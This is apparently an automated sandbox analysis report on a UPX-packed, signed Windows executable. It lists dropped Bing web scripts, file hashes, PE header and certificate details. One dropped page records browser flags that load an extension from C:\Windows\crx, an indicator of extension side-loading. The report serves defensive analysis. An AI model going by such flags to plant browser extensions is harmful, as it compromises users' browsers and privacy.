                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):964
                                                                                                                                                                                                        Entropy (8bit):4.421237058266115
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (357), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):357
                                                                                                                                                                                                        Entropy (8bit):5.100320804030099
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGXTMkCDpk6CSVKvxpKv8Ed7fxu7hJRJeGMYS+ePekKfT32PV9m+8mq1mqJFO:2QVlY8EbgRUGhS+eTKb2PVESq8qrO
                                                                                                                                                                                                        MD5:2DF9793CF020A37C88178BE84311427A
                                                                                                                                                                                                        SHA1:29CFE86239722D4F4AF07C494D676092896A8600
                                                                                                                                                                                                        SHA-256:A69D257EEE41E843881D548D2E4EE5A0727B889AB22BFFDAA8ED1074E802BCC6
                                                                                                                                                                                                        SHA-512:E9A35EC1E466FEB3E273FB991A3282BA1C45FD0EACEA956E9821914CC4261377684B062BDE888EBF5767BBC055DB191DC14E00AF8037B5607449C06E5D2DD082
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function r(n){if(n&&(i=0),!(i>60)){i++;var u=_w.CursorProgress||_w.CursorProgressFull;u&&u.bind();t&&sb_ct(t);t=sb_st(r,1e3)}}function n(){r(!0)}var t=null,i=0;n();typeof sj_be!="undefined"&&sj_be(_w,"load",n);typeof sj_evt!="undefined"&&(sj_evt.bind("onP1",n),sj_evt.bind("onP1Lazy",n),sj_evt.bind("ajaxReady",n),sj_evt.bind("ajax.load",n))})()
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2683), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                        Entropy (8bit):5.285209446790883
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:5sksi0wg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahff/Z/92zBDZDNJC0x0M:yk1g1zbed3SBkdZ9ZGVFNJCRM
                                                                                                                                                                                                        MD5:FB797698EF041DD693AEE90FB9C13C7E
                                                                                                                                                                                                        SHA1:394194F8DD058927314D41E065961B476084F724
                                                                                                                                                                                                        SHA-256:795E9290718EB62A1FB00646DC738F6A6B715B1171DD54A3D2DEFA013A74F3DA
                                                                                                                                                                                                        SHA-512:E03C4AB727567BE95B349B971E29CFFB3890CFB1A1DDF997B34B9D69154294A00A5112F4FFCA4DF4E26BBF96AFA75E5943E965EDC8F8E21035ED2EF30B7688D8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null||t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),!window.isNaN(o)&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","G
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21920)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):21951
                                                                                                                                                                                                        Entropy (8bit):5.3573914200107335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:Kh4kT1lYxfqyDOhKMpWMEVhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0wzueAi:Y5Tifh3bBpBnqIH+Z6sepXv0uQaV
                                                                                                                                                                                                        MD5:51775361FD842E7E41AF84A01C8AB92C
                                                                                                                                                                                                        SHA1:21D108490F70991727A3B044983342517336B53F
                                                                                                                                                                                                        SHA-256:8B549EEF372338FC3F5632B9BD47AD2C2876229E573095CCBC6B7867A47153F9
                                                                                                                                                                                                        SHA-512:96FD8D92BA98B65B4BD34FF57F351123EA907C3DC91A4814F8DE3E6985B6BC9CA0972F8E6CBEE072F50742CA5F19D03F623C32EB5061C9CA1D6A3CFB47344DCE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (412), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                        Entropy (8bit):5.17305928357574
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2QBdoySw+YEXj3Gs07fZVD7H82MgNukm7UqgU:2Qb7+YEXz4fZxHjmoRU
                                                                                                                                                                                                        MD5:581C2C396720F651CC2F3D40E9E727F8
                                                                                                                                                                                                        SHA1:6515C6C20730DCF81A861EA8D16682AAC4DDA273
                                                                                                                                                                                                        SHA-256:D6787BD009EA758F8ABDD437032799F7004247FC10F631B93AF0FA84607597EC
                                                                                                                                                                                                        SHA-512:E7198C04B0E8CEE80B8278E77FA0C301915B32F62C0DB36C1D7D2D9E20A7ACD578308070EB833ED8450A2360358E118E55B47DB149FB4AB8053E8FAA2C925568
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){var n=_d.querySelector("#b_header .b_scopebar>ul #b-scopeListItem-web");n===null||n===void 0?void 0:n.addEventListener("click",function(){var i,t,r;if(n&&Lib.CssClass.contains(n,"b_active"))try{i=_ge("b_header");i.scrollIntoView({behavior:"smooth"});t=_ge("sb_form_q");t.focus();t.click();r=t.value;t.setSelectionRange(0,r.length)}catch(u){_w.sj_log&&sj_log("CI.WebScope","error",u.message)}},!0)})()
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):226
                                                                                                                                                                                                        Entropy (8bit):4.923112772413901
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                                                                                                                                                        MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                                                                                                                                                        SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                                                                                                                                                        SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                                                                                                                                                        SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:53:43], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4934
                                                                                                                                                                                                        Entropy (8bit):7.782095567670307
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sHbZoNWsmjRgjXFQvdXNkuz4nicDWk+4Nf6Q2mKwADHfXC7OWn:sFmmjGjWddkuz4nicyktAtmtAbuLn
                                                                                                                                                                                                        MD5:FDA2CEAE0679611937E6E71F701A36AB
                                                                                                                                                                                                        SHA1:75B98D4B8E7142F0F57620296354F61C4C6F3A8F
                                                                                                                                                                                                        SHA-256:B818C1E9B0B46CCCDC158ACA581C3C5F4A9BD3DDA380DA03AF52F43F14F5651E
                                                                                                                                                                                                        SHA-512:904100EBE310AFDF86C2E4C9CBDDC118178D41B45D076BB6077DB8F3BCED8B3CEDF545CE079E39B6F8034C2247FD4C824C0522B6221E3CDC02423AF8EEB9F8A3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5961), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5961
                                                                                                                                                                                                        Entropy (8bit):5.432641972148736
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:9jaZQZ13PJOQU88YQCNsdeEjhjSCnSA1y2A1Qnyoy+y25syeOWNKo5xpzlVUILjI:paWT3REjhNn5y1Myoy+y25syZWNKo5xA
                                                                                                                                                                                                        MD5:8BE63544771E19931F22DB03D5212B87
                                                                                                                                                                                                        SHA1:86A4518FBB87B707713234D6F41AED3642CC46FD
                                                                                                                                                                                                        SHA-256:4DD9F4B2714212665842874D337CD76474D1A9DE81BC7388AE0828E04624CF17
                                                                                                                                                                                                        SHA-512:EFF45BEE81D00E1D69BB6F937F557928438E284C8C0E4D7A67FC711FDE114CA460901D5F242C682BD0453A188F96B6AF68FDED48514023BF893568A6633743D9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, xresolution=86, yresolution=94, resolutionunit=2, software=GIMP 2.10.18, datetime=2020:04:16 19:04:38], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3791
                                                                                                                                                                                                        Entropy (8bit):7.08266375441937
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:6lg111b8TUEfN/R5Cx2ftlv8Zkj81vPZsYf:0g11u5FR5CUtlkZPRKY
                                                                                                                                                                                                        MD5:299A479A2F7F1F30D09545CA8CC5D162
                                                                                                                                                                                                        SHA1:871F9E79AD73AAD0B3E0AD1B5B6B87FE837B16CE
                                                                                                                                                                                                        SHA-256:B314EAD01E8E89C964273418BB1117D24DFE01E4838E7A1B46FA19F64699AF05
                                                                                                                                                                                                        SHA-512:9D8DA9F1247D5D097E8AAAB4346AADE12E2BC74D6F9446760A5A3A45D9C2D48782D456CE05AC6FD2F0572CD26A562F2D0E4C55048FDAEC138F398A715743437D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                        Entropy (8bit):5.098203134109495
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:GtAJv9xWHXWpwYMEX3IR6lVDZWhHD6GkPsHKHOZzu2wBRHJhNURtAJ4ZQetAJD:GeyWeYMEnsUVoHoigkhwBRphNQR+e+
                                                                                                                                                                                                        MD5:0794C2FFC9AAF238496BF687A9C68799
                                                                                                                                                                                                        SHA1:7938BE485611F9D417E84B8C0A74BD3C589E052F
                                                                                                                                                                                                        SHA-256:805AAA9634639B2EAA912E117219727DFA6E92A63B8B92569C336A9CCDE52DEE
                                                                                                                                                                                                        SHA-512:FEFBFBD39B9B86D8975D8FAAB62B50515488E9BF1E21AD72FED9FA93614E10ADAFC99DA77349EAD2501B89D422D766ADC313B6024BCB9B331AB83A7B99BB135F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var SBIImgsHelper;(function(){function i(){typeof SbiUtil!="undefined"&&(SbiUtil===null||SbiUtil===void 0?void 0:SbiUtil.oncop(SbiUtil.rt,r))}function r(i){var r=i.target||i.srcElement,u;r&&r.tagName==="IMG"&&r.classList.contains(n)&&r.src&&(u=r.getAttribute(t),u&&sj_evt&&sj_evt.fire&&sj_evt.fire("sbi_searchimgurl",SbiUtil.gimg(r),u,null,SbiUtil.gaps(r)))}var n="sbiable",t="data-sbiid";i()})(SBIImgsHelper||(SBIImgsHelper={}))
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65448)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):94707
                                                                                                                                                                                                        Entropy (8bit):5.407635683386335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:GSqLAEwLuZAFL1oL3SDk5v1VWkNWPEYydLLnnS+7ySGAEMbiYnRGwVKVt+RFVDh4:GJMCUCuW3WkNtnnDGgGwVKWklyGEQ
                                                                                                                                                                                                        MD5:AA2BEDDF57312EF1CD312880E2729EBA
                                                                                                                                                                                                        SHA1:8E53B59585F8C947924355AFDC72A62E27CD001C
                                                                                                                                                                                                        SHA-256:16933DCF75634F75F0A09A67FB0FF7D9D0556188A888CDD89E05F2D21997BB51
                                                                                                                                                                                                        SHA-512:64AC2CCE15619DA127C5F1B637BBB39C1EB3DB69DE30FB690863C7390EC0A6D0BA2BEE9B9BC20DFF2B4044D17CED483CE5294E624F792652E8E4E1AD6FFAD4DD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (48370), with CRLF, LF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):202940
                                                                                                                                                                                                        Entropy (8bit):5.621049198249498
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:kqQQ1tfmDR5zQ9oEYZ5YN/FIClBgM4ASRBpMGDcUly:LQQ1t+DRZzpzw/DBgOvGDc7
                                                                                                                                                                                                        MD5:F43BF2F6193E42D25ED382DE22C9E439
                                                                                                                                                                                                        SHA1:3A3A613836FBA7A502E4F42264A72FA4893F115C
                                                                                                                                                                                                        SHA-256:B1B3C8A72E6D28C4B53695FB6BE99FEAEB691C916869F060211DE424549B58A1
                                                                                                                                                                                                        SHA-512:DBA259F14D32987DA6A6A7977831E221AD201B3B4BC7E3EF1D831CF32FBDC1C1A4C39899E24FDE55EBED184585C92C7F9416C15F67E3269F69495F1FFC5BB846
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="http://schemas.live.com/Web/"><script type="text/javascript" nonce="GEk4O+lodiYXkJfrZr+ztQWSMpLFg9N3i8ZCQdW6b+4=" >//<![CDATA[..si_ST=new Date..// </script><head> pc--><title>--disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints --load-extension=C:\Windows\crx - Search</title><meta content="text/html; charset=utf-8" http-equiv="content-type" /><meta name="msapplication-TileImage" content="/sa/simg/bing_p_hd.png" /><meta name="msapplication-TileColor" content="#0C8484" /><meta name="SystemEntropyOriginTrialToken" content="A1L3tx5CzccqjN3lK6st/fXMwhf9EeokCPf8XCt0DVI8JPbg37BWq0zKvlqgkdm8YEUbthoGkC/xdR1+iIz4txAAAABxeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiTXNVc2VyQWdlbnRMYXVuY2hOYXZUeXBlIiwiZXhwaXJ5IjoxNzM5NzI0MzExLCJpc1N1YmRvbWFpbiI6dHJ1ZX0=" http-equiv="origin-trial" /><meta property="og:
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4646), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4646
                                                                                                                                                                                                        Entropy (8bit):5.223823464776493
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:/MVnaRENlgVWIjomiJesPbrtwyAZBd3nxEd7NBu:/CaRENlgVMJhPbrtwyGBdnxEd7NI
                                                                                                                                                                                                        MD5:9EED9C1E6E746CFE4DD9E899F06C3E11
                                                                                                                                                                                                        SHA1:F25299247D020578CA0C30DC738552036819663E
                                                                                                                                                                                                        SHA-256:39AD6BE13A6186BF011C53610C13EE0FD4E9AD51CC28BF49B8FA815CBDC47E8E
                                                                                                                                                                                                        SHA-512:3088F428B747D659EB4C0385830E4B3FA95C9269427A49B2695C9C082429605A8F3FB694CF3B0690280E9D1ACBF862597CEAEDB91945BAF70F60900AA919CCCE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (44387), with NEL line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):194844
                                                                                                                                                                                                        Entropy (8bit):5.419132326845799
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:oSYgu0Mj/PJ3floxEsQtzbwDZ777/3DwLps0p:oSYguVJvSa5+Z7uOE
                                                                                                                                                                                                        MD5:1C8B7CFD513B7ECA52BA64947CEE70E4
                                                                                                                                                                                                        SHA1:6BA3FBE2E7514E981EB68E9A92E9EA7A499CCC0C
                                                                                                                                                                                                        SHA-256:D1730E14E7E3D2362E6C5FF0C9C36E08660F87317EC44551FAED419263240F2C
                                                                                                                                                                                                        SHA-512:1F6567D3870CFBE002CD447135020C9F1319DFAB76E3CEAFE4C62BDD79F78F2AB3E5958DE9E068A3937E1C469978FC2E4A56015B82E06FE1377A78B47D1B06DC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                        Entropy (8bit):0.3613836054883338
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                                                                        MD5:679672A5004E0AF50529F33DB5469699
                                                                                                                                                                                                        SHA1:427A4EC3281C9C4FAEB47A22FFBE7CA3E928AFB0
                                                                                                                                                                                                        SHA-256:205D000AA762F3A96AC3AD4B25D791B5F7FC8EFB9056B78F299F671A02B9FD21
                                                                                                                                                                                                        SHA-512:F8615C5E5CF768A94E06961C7C8BEF99BEB43E004A882A4E384F5DD56E047CA59B963A59971F78DCF4C35D1BB92D3A9BC7055BFA3A0D597635DE1A9CE06A3476
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                        Entropy (8bit):0.3613836054883338
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                                                                        MD5:679672A5004E0AF50529F33DB5469699
                                                                                                                                                                                                        SHA1:427A4EC3281C9C4FAEB47A22FFBE7CA3E928AFB0
                                                                                                                                                                                                        SHA-256:205D000AA762F3A96AC3AD4B25D791B5F7FC8EFB9056B78F299F671A02B9FD21
                                                                                                                                                                                                        SHA-512:F8615C5E5CF768A94E06961C7C8BEF99BEB43E004A882A4E384F5DD56E047CA59B963A59971F78DCF4C35D1BB92D3A9BC7055BFA3A0D597635DE1A9CE06A3476
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):190
                                                                                                                                                                                                        Entropy (8bit):4.511104462581999
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:LDIdyGK3Mp9AUEvCSdD+Z8BGMbAGTY2UpBHeVKLDMJQn4U9VTcYDUhQreKvRiQGU:3T8iUbSQGj82UvHegOxUgYDUQpG5gz
                                                                                                                                                                                                        MD5:8FC8760C489E4AA580E6A197325D7D40
                                                                                                                                                                                                        SHA1:6F19E7AAB7F94C6E1EB05432DE5CE4CEF90334E8
                                                                                                                                                                                                        SHA-256:AE04FD367F249A18E3764200D60C6A18A525C1D99BB5C0A9683B6C37B48B4CAD
                                                                                                                                                                                                        SHA-512:A74AF085196B238F99C7D578271A00537C58A9AA57145179585A3E3E259162C95C094D26C1650262F2E8387FCFBC246141B77BBE291B6B8EA754CBC8B5D5F81E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:[Profile]..config1=102e1490f0604c078f675cf9899bc6e6..config2=c75a6d6f209a4f9c616f095dc76f8b89..config3=29f59366511ef064441d7b0e5b68c197..config4=1b3d82ff206f2697db14bb5ee90b3a8d..config5=1..
                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                        Entropy (8bit):7.889040863631203
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                                                                                                                        • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:nv8401986_110422.exe
                                                                                                                                                                                                        File size:668'064 bytes
                                                                                                                                                                                                        MD5:31549917cdc6e3f9d40a48ea5998493f
                                                                                                                                                                                                        SHA1:c0f7e826645b1ba2ba1fed866992beb9de7a31df
                                                                                                                                                                                                        SHA256:73f03b369e9df60c2dc97baefcdc4ba920da3a2126c873a4654e1a83510d3b87
                                                                                                                                                                                                        SHA512:709737c36ef4fe96e99dcac210854a760cbbcff7af428620a0a83f16a5db09af4dbe2b52ccd4cff08fe0d5d4e544ddd9474c7c45005938a32705960c3581dad1
                                                                                                                                                                                                        SSDEEP:12288:pC6wyk1nvfBP0FQoOd/566f81qjbravk7o3xLWAB8TMfo+aqwFtaif8dHOqPNspj:pC6wp1vfhboOb66Uyavk8hdo+g8BOONu
                                                                                                                                                                                                        TLSH:78E42231EAA94801F21BCD367951C6B22878FC44D3D1920B63DCBF67ABBA711513876E
                                                                                                                                                                                                        File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$......._.d..............3.......3.......3..;...........I...............I...K...I...8...............8...............G.......Q.......C..
                                                                                                                                                                                                        Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                                                        Entrypoint:0x5a4c40
                                                                                                                                                                                                        Entrypoint Section:UPX1
                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x618CFCC6 [Thu Nov 11 11:21:42 2021 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                        Import Hash:15067c0e1192397d25d55aa213865b7e
                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                        Error Number:0
Not Before: 03/11/2021 01:00:00
Not After: 03/11/2023 00:59:59
                                                                                                                                                                                                        Subject Chain
• CN=合肥听风雨网络科技有限公司, O=合肥听风雨网络科技有限公司, L=合肥市, S=安徽省, C=CN, SERIALNUMBER=91340100MA8NA4PN5X, OID.1.3.6.1.4.1.311.60.2.1.1=合肥高新技术产业开发区, OID.1.3.6.1.4.1.311.60.2.1.2=安徽省, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                        Thumbprint MD5:2883C1DCA1C6A339268847E20993A65A
                                                                                                                                                                                                        Thumbprint SHA-1:A4262E248912D755E4E4008E1444CCA4ABE26216
                                                                                                                                                                                                        Thumbprint SHA-256:CCEEB9A2702DC6CC8A1DA0E4C316FE4F8A4F066D9622DF8AFD3814F05D1AD65C
                                                                                                                                                                                                        Serial:0D7A7FD32102026A7C34FDEBA6F3851D
                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        pushad
                                                                                                                                                                                                        mov esi, 0050D000h
                                                                                                                                                                                                        lea edi, dword ptr [esi-0010C000h]
                                                                                                                                                                                                        mov dword ptr [edi+001961A4h], 6FE57FF9h
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        or ebp, FFFFFFFFh
                                                                                                                                                                                                        jmp 00007F3BA905DBD0h
                                                                                                                                                                                                        nop
                                                                                                                                                                                                        nop
                                                                                                                                                                                                        nop
                                                                                                                                                                                                        nop
